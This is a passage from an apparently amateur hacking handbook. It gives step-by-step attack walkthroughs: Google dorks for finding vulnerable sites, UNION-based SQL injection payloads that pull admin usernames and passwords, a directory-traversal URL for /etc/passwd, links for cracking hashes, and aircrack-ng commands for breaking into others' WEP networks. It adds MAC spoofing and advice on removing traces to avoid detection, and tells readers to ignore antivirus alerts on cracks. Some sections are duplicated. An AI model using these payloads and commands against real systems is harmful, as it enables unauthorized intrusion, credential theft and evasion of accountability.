Before downloading any Crack and Keygen . Go to the Website:
;
Now copy the download link of the Keygen or crack in the URL box provided on website
this website contains all the world famous antiviruses and it will scan file for you if it
contains any virus just ignore that otherwise have fun with crack or Keygen.

3. Pen drive or USB drive solution:

How you can protect your system from being infected from the pen drive. Just do the
following three things rest is being cared by your antivirus.
1. Turn off Auto Play Devices:
To do it Go to Start Menu> RUN>type gpedit.msc and press enter>User
Configuration>Administrative templates>System>Turn off Autoplay> click on
enable and then select all drives.
2. Turn of Computer Browser service:
To do it Go to Start Menu> RUN>type services.msc and press enter>then Find
Computer Browser service and disable it and restart your system.
3. Most important one Always scan the Pen drive or External hard drives after connecting
them.

4.Downloading things from Unknown Sites

Solution:

copyright 2016 EAPL

42

The solution of this problem is already provided Web browser Security toolbar will help
you in surfing only secured and genuine websites and if you want to visit and download
Virus Total will help you to identify the file whether its infected or not.

5. Now for Hacker like me i.e Method to use

or test Hack tools.
Why I have mentioned this is simply because Hackers always take benefit of these
noobish tricks that they attach viruses with files and name them as hack tools . So avoid
them if you are too curious like me. Then there are several ways to Handle it.
1. Use Deep Freeze on C drive: For testing Hack tools always use deep freeze as after
the next restart your system will be at same position as it was previous.
2. Install Virtual Box and over virtual box install another Windows and test all hack tools
using virtual windows. This will protect your system from being infected. Also It will give
you more knowledge about handling the viruses and other situations like when
something wrong is done what i have to do.
3. Create two to three fake email IDs and use them for testing Keyloggers and other
fake email hacking softwares.
For Some more security Tips you can also read my previous article:

HACKING WEB SERVER

Hello friends , welcome back to hacking class, today i will explain all the methods that are
being used to hack a website or websites database. This is the first part of the class How to
hack a website or Websites database and in this i will introduce all website hacking
methods. Today I will give you the overview and in later classes we will discuss them one by
one with practical examples. So guys get ready for first part of Hacking websites class.
Dont worry i will also tell you how to protect your websites from these attacks and other
methods like hardening of SQL and hardening of web servers and key knowledge about
CHMOD rights that what thing should be give what rights

Note : This post is only for Educational Purpose

only.
copyright 2016 EAPL

43

What are basic things you should know before

website hacking?
First of all everything is optional as i will start from very scratch. But you need atleast basic
knowledge of following things..
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how servers work.
4. And most important expertize in removing traces otherwise u have to suffer consequences.
Now First two things you can learn from a very famous website for basics of Website design
with basics of HTML,SQL,PHP and javascript.
http://www.w3schools.com/

And for the fourth point that you should be expert in removing traces . For this you can refer
to first 5 hacking classes and specially read these two
1. Hiding Yourself from being traced.
copyright 2016 EAPL

44

2. Removing your Traces

As we know traces are very important. Please dont ignore them otherwise you can be in big
trouble for simply doing nothing. so please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or loophole in
which a attacker injects SQL code through a web form or manipulate the URLs based on
SQL parameters. It exploits web applications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.

What are basic things you should know before

website hacking?
First of all everything is optional as i will start from very scratch. But you need atleast basic
knowledge of following things..
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how servers work.
copyright 2016 EAPL

45

4. And most important expertize in removing traces otherwise u have to suffer consequences.
Now First two things you can learn from a very famous website for basics of Website design
with basics of HTML,SQL,PHP and javascript.
http://www.w3schools.com/

And for the fourth point that you should be expert in removing traces . For this you can refer
to first 5 hacking classes and specially read these two
1. Hiding Yourself from being traced.
2. Removing your Traces

As we know traces are very important. Please dont ignore them otherwise you can be
in big trouble for simply doing nothing. so please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or
loophole in which a attacker injects SQL code through a web form or manipulate
the URLs based on SQL parameters. It exploits web applications that use client
supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.

2. CROSS SITE SCRIPTING

Cross site scripting (XSS) occurs when a user inputs malicious data into a website,
which causes the application to do something it wasnt intended to do. XSS attacks
copyright 2016 EAPL

46

are very popular and some of the biggest websites have been affected by them
including the FBI, CNN, Ebay, Apple, Microsft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
Search Engines
Login Forms
Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side
security mechanisms normally imposed on web content by modern browsers. By finding ways of
injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive
page content, session cookies, and a variety of other information maintained by the browser on behalf
of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading..

3. REMOTE FILE INCLUSION

Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for
browsing remote files and running your own code on a server), is included into a website which allows
the hacker to execute server side commands as the current logged on user, and have access to files on
the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :

Code execution on the web server

Code execution on the client-side such as Javascript which can lead to other attacks such as
cross site scripting (XSS).

Denial of Service (DoS)

Data Theft/Manipulation

4. LOCAL FILE INCLUSION

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of
directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file
contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I
discussed for RFIs.
Lets say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of
directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
I will explain it in detail with practical websites example in latter sequential classes on Website
Hacking.

5. DDOS ATTACK
copyright 2016 EAPL

47

Simply called distributed denial of service attack. A denial-of-service attack (DoS attack)
ordistributed denial-of-service attack (DDoS attack) is an attempt to make a computer
resource unavailable to its intended users. Although the means to carry out, motives for, and targets of
a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an
Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS
attack we consumes the bandwidth and resources of any website and make it unavailable to its
legitimate users.
For more detailed hack on DDOS visit:

6.EXPLOTING VULNERABILITY
Its not a new category it comprises of above five categories but i mentioned it separately because there
are several exploits which cannot be covered in the above five categories. So i will explain them
individually with examples. The basic idea behind this is that find the vulnerability in the website and
exploit it to get the admin or moderator privileges so that you can manipulate the things easily.

SQL INJECTION
Hello friends in my previous class of How to hack websites, there i explained the
various topics that we will cover in hacking classes. Lets today start with the first
topic Hacking Websites using SQL injection tutorial. If you have missed the previous
hacking class dont worry read it here.

So guys lets start our tutorial of Hacking Websites using SQL injection technique.
First of all, i will provide you the brief introduction about SQL injection.

Note: This article is for Educational Purposes only. Please Dont misuse
it. Isoftdl and me are not responsible of any misuse done by you.

MySQL database is very common database system these days that websites use and
you will surprise with the fact that its the most vulnerable database system ever.Its

copyright 2016 EAPL

48

has unlimited loopholes and fixing them is a very tedious task. Here we will discuss
how to exploit those vulnerabilities manually without any tool.

Hacking Websites using SQL Injection

STEPS TO HACK WEBSITES USING SQL

INJECTION
1. Finding the target and vulnerable websites
First of all we must find out our target website. I have collected a lot of dorks i.e the
vulnerability points of the websites. Some Google Searches can be awesomely utilized
to find out vulnerable Websites.. Below is example of some queries..

Examples: Open the Google and copy paste these queries

inurl:index.php?id=

inurl:trainers.php?id=

copyright 2016 EAPL

49

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

Search google for more google dorks to hack websites. I cannot put them on my
website as they are too critical to discuss. We can discuss them in comments of this
posts so keep posting and reading there.

2. Checking for Vulnerability on the website

Suppose we have website like this:-

copyright 2016 EAPL

50

h**p://www.site.com/products.php?id=7

To test this URL, we add a quote to it

h**p://www.site.com/products.php?id=7

On executing it, if we get an error like this: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
etcOr something like that, that means the target website is vulnerable to sql
injection and you can hack it.

3). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to
order the result) so how to use it? Well just incrementing the number until we get an
error.

h**p://www.site.com/products.php?id=5 order by 1/* > no error

h**p://www.site.com/products.php?id=5 order by 2/* > no error

h**p://www.site.com/products.php?id=5 order by 3/* > no error

h**p://www.site.com/products.php?id=5 order by 4/* > Error (we get message like

this Unknown column 4 in order clause or something like that)

copyright 2016 EAPL

51

that means that the it has 3 columns, cause we got an error on 4.

4). Check for UNION function

With union we can select more data in one sql statement.

So we have

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

5). Check for MySQL version

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try

its a comment and its important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33log or 5.0.45 or similar.

it should look like this

copyright 2016 EAPL

52

h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error union + illegal mix of collations (IMPLICIT + COERCIBLE)

I didnt see any paper covering this problem, so i must write it .

What we need is convert() function
i.e.
h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version
using latin1),3/*

or with hex() and unhex()

i.e.

h**p://www.site.com/products.php?id=5 union all select

1,unhex(hex(@@version)),3/*

and you will get MySQL version .

6). Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12) < later i will describe
for MySQL greater than 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s

common column names are: username, user, usr, user_name, password, pass,
passwd, pwd etc
i.e would be
copyright 2016 EAPL

53

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and thats good )

We know that table admin exists

Now to check column names.

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from

admin/*

(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc

now to check if column password exists

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from

admin/*

(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database
is set up
i.e md5 hash, mysql hash, sha1
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e
h**p://www.site.com/products.php?id=5 union all select
1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
copyright 2016 EAPL

54

(there is another way for that, char(58), ascii value for : )

h**p://www.site.com/products.php?id=5 union all select

1,concat(username,char(58),password),3 from admin/*

Now we get displayed username:password on screen, i.e admin:admin or

admin:somehash
When you have this, you can login like admin or some superuser.
If cant guess the right table name, you can always try mysql.user (default)
It has user password columns, so example would be

h**p://www.site.com/products.php?id=5 union all select

1,concat(user,0x3a,password),3 from mysql.user/*

7). MySQL 5
Like i said before im gonna explain how to get table and column names
in MySQL greater than 5.

For this we need information_schema. It holds all tables and columns in database.

To get tables we use table_name and information_schema.tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from

information_schema.tables/*

copyright 2016 EAPL

55

Here we replace the our number 2 with table_name to get the first table from
information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all
tables.
i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from

information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from

information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from

information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth,
auth_user etc

To get the column names the method is the same.

copyright 2016 EAPL

56

Here we use column_name and information_schema.columns

the method is same as above so example would be

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from

information_schema.columns limit 0,1/*

The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)

ie.

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from

information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc

If you wanna display column names for specific table use this query. (where clause)
Lets say that we found table users.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from

information_schema.columns where table_name=users/*

Now we get displayed column name in table users. Just using LIMIT we can list all
columns in table users.
Note that this wont work if the magic quotes is ON.
Lets say that we found colums user, pass and email.
copyright 2016 EAPL

57

Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.

i.e

h**p://www.site.com/products.php?id=5 union all select

1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com

But the passwords are in hash format so we need to crack the hash. Note 90% of hash
are crackable but 10% are still there which are unable to crack. So dont feel bad if
some hash doesnt crack.

For Cracking the MD5 hash values you can use

this :

1) Check the net whether this hash is cracked before:

Download:
http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:

Download::

copyright 2016 EAPL

58

http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php

3) Use a MD5 cracking software:

Download:
http://rapidshare.com/files/13696796CF_2.10_2b.rar

Password = OwlsNest
STEPS TO HACK WIFI OR WIRELESS PASSWORD
1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers
with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE

2.

SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on
the black box in the lower left corner to load up a KONSOLE . Now you should start your
Wifi card. To do it so type
airmon-ng

You will see the name of your wireless card. (mine is named ath0) From here on out,
replace ath0 with the name of your card. Now type

airmon-ng stop ath0

then type:

copyright 2016 EAPL

59

ifconfig wifi0 down

then type:

macchanger mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps i have explained is to spoof yourself from being traced. In above step
we are spoofing our MAC address, this will keep us undiscovered.

Now type:
airodump-ng ath0
All above steps in one screen shot:

copyright 2016 EAPL

60

Now you will see a list of wireless networks in the Konsole. Some will have a better
signal than others and its always a good idea to pick one that has a best signal
strength otherwise it will take huge time to crack or hack the password or you may
not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze
the airodump screen HOLD the CNTRL key and Press C.
Now you will see something like this:

copyright 2016 EAPL

61

3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the
encryption for that network is WEP. If it says WPA or any variation of WPA then
move onyou can still crack WPA with backtrack and some other tools but it is a
whole other ball game and you need to master WEP first.

copyright 2016 EAPL

62

Once youve decided on a network, take note of its channel number and bssid. The
bssid will look something like this
00:23:69:bb:2d:of
The Channel number will be under a heading that says CH.
As shown in this figure:

copyright 2016 EAPL

63

Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) bssid (bssid) ath0
The file name can be whatever you want. This file is the place where airodump is
going to store the packets of info that you receive to later crack. You dont even put in
an extensionjust pick a random word that you will remember. I usually make mine
Ben because I can always remember it. Its simply because i love
ben10.hhahahahaha :D
Note: If you want to crack more than one network in the same session, you must have
different file names for each one or it wont work. I usually name them as ben1, ben2
etc.
Once you typed in that last command, the screen of airodump will change and start
to show your computer gathering packets. You will also see a heading marked IV
with a number underneath it. This stands for Initialization Vector but in general
terms all this means is packets of info that contain characters of the password.
Once you gain a minimum of 5,000 of these IVs, you can try to crack the password.
Ive cracked some right at 5,000 and others have taken over 60,000. It just depends
on how long and difficult they made the password. More difficult is password more
packets you will need to crack it.

4. Cracking the WEP password

copyright 2016 EAPL

64

Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your
computer even though you are not officially connected with the password. If this
command is successful, you should see about 4 lines of text print out with the last
one saying something similar to Association Successful :-)
If this happens, then good! You are almost there.
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Dont worry about what
these meanjust know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts
to happen within secondssometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath the IV starting to rise rapidly. This is great! It
means you are almost finished! When this number reaches AT LEAST 5,000 then
you can start your password crack. It will probably take more than this but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was Ben. Dont put a space in
between it and -01.cap here. Type it as you see it. So for me, I would type wepkey01.cap
Once you have done this you will see aircrack fire up and begin to crack the
password. typically you have to wait for more like 10,000 to 20,000 IVs before it will
crack. If this is the case, aircrack will test what youve got so far and then it will say
something like not enough IVs. Retry at 10,000.
copyright 2016 EAPL

65

DONT DO ANYTHING! It will stay runningit is just letting you know that it is on
pause until more IVs are gathered. Once you pass the 10,000 mark it will
automatically fire up again and try to crack it. If this fails it will say not enough IVs.
Retry at 15,000. and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the
password! now if the password looks goofy, dont worry, it will still work. some
passwords are saved in ASCII format, in which case, aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format in which case the computer will show you the HEX
encryption of the password. It doesnt matter either way, because you can type in
either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a
colon after every 2 characters. So for instance if the password was secret, it would
be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like 0FKW9427VF then it would still display as:
0F:KW:94:27:VF

copyright 2016 EAPL

66

Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful
attempts, you will get very quick with it. If I am near a WEP encrypted router with a
good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do, falls completely on you becausetechnicallythis is just for you
to test the security of your own network.
I hope you all liked it. If you have any queries then ask me.

copyright 2016 EAPL

67